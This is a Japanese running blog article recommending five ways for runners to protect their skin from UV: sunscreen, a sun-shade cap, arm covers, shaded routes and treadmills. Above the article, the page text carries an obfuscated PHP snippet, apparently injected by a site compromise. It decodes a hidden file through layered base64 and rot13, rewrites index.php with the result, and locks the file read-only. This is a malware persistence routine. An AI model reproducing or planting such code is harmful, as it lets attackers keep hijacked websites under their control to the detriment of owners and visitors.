$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } 夏場のランニングは5つの紫外線対策で乗り切ろう | TAKUTIVITY – タクティビティ

夏場のランニングは5つの紫外線対策で乗り切ろう

ランニング
スポンサーリンク

全てのランナーさんに気をつけて欲しいことの一つとして、紫外線による肌へのダメージが挙げられます。1年を通して気をつけるべきですが、やはり春先以降は紫外線も強くなりがちです。特に注意したいのがUV-B紫外線が最も強くなる7月、8月の時期です。

紫外線の種類

UV-B紫外線とは?

UV-B紫外線はレジャー紫外線と呼ばれ屋外で注意が必要な紫外線です。波長が短く屋内には届きませんが、屋外での日焼けのほとんどがこのUV-B紫外線によるものです。つまり、ランニングなど屋外のアクティビティではこのUV-B紫外線のケアが必要です。皮膚の炎症やシミの原因となります。気象庁で観測している紫外線はこのUV-B紫外線ですので、気象庁の紫外線情報も参考にすると良いでしょう。

その他の紫外線

UV-B紫外線以外の種類は、UV-AとUV-Cがあります。UV-Cはオゾン層ですべて吸収されるため地表には届きません。一方、UV-A紫外線は生活紫外線と呼ばれ波長が長く屋内にも届きます。5月に紫外線が最も強くなると言われているのはこのUV-A紫外線なのです。

女性ランナーのみならず男性ランナーもしっかりと紫外線対策をしましょう。これを怠った場合、長い年月をかけて肌へのダメージが蓄積され年をとったときに肌がカピカピになってしまう危険性があります。この記事ではランナーさんにお薦めしたい紫外線対策を5つ共有したいと思います。

日焼け止めクリーム

そんなの分かるわっ!という声が聞こえてきそうですが意外と塗るのがめんどくさくて、やっていない方多いんじゃないでしょうか?自分も塗らなきゃと思ってはいるのですが、つい忘れてしまったりします。

日焼け止めはウォータープルーフタイプを選びましょう。汗でクリームが落ちてしまっては意味がありません。水分で落ちにくいウォータープルーフがオススメです!

日避け付きキャップをかぶる

日除け付きキャップとは後頭部から首元や耳を覆う布がついているキャップのことです。通常のロードではあまり見かけないスタイル。ご年配のランナーさんがたまに被っているのをみかけるくらいでしょうか?あとシルエットが昔の日本兵みたいになりますがそこは気にしないでおきましょう。

アームカバーをつける

腕の日よけ対策ではアームカバーが良いでしょう。真夏は暑いですが春先や秋口であれば問題ないでしょう。ランニング中に暑いようだったら縮めたりすることもできるので、日よけ対策を行いながら体温調節も行いやすいのがメリットです。

直射日光の少ない場所を走る

市街地でのランニングでは少しでも日陰になる場所を走りましょう。日除け対策をしつつ体力消耗を抑えることができます。それでも市街地だとどうしても直射日光を受ける方が多くなってしまいますよね?そんなときは樹木の多い公園や低山でのトレイルランイングがおススメです。大きな公園や電車で1時間程度でいける低山などを探してみてはいかがでしょうか。

ロードは諦めてトレッドミル

もはや究極の紫外線対策として最後に挙げたいのが屋内のトレッドミル。直射日光を受けないので対策としてはこれが一番よいでしょう(笑)しかし、トレッドミルもうまく活用すればよいトレーニングになります。気軽にスピードの変化をつけたり傾斜をつけたりできるので自分のレベルに合った設定で行ってみると良いでしょう。毎日のロードワークに変化を加えて気分転換にもなります。

まとめ

紫外線は目に見えないものなので対策を疎かにしがちですが、末永く健康的な肌をキープするには欠かせない事です。やはり必ず行いたのは日焼け止めクリームを塗ること。ランニング前の数分で済む紫外線対策で美肌をキープしていきましょう!

コメント